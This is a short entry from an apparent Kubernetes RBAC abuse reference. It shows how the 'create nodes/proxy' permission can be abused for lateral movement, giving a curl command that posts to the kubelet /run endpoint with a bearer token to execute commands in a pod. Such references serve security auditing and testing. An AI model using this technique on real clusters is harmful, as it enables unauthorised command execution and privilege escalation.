can-i gtfo?

Kubernetes RBAC Abuse Collection

create nodes/proxy

Verb: create

Resource: nodes/proxy

Description: Allows to make CREATE requests to the kubelet API as system:masters

Abuses

Lateral Movement

Execute commands in a pod

curl -k -H "Authorization: Bearer TOKEN" -XPOST https://{IP}:10250/run/NAMESPACE/POD/CONTAINER -d "cmd=whoami"

References

https://www.aquasec.com/blog/privilege-escalation-kubernetes-rbac/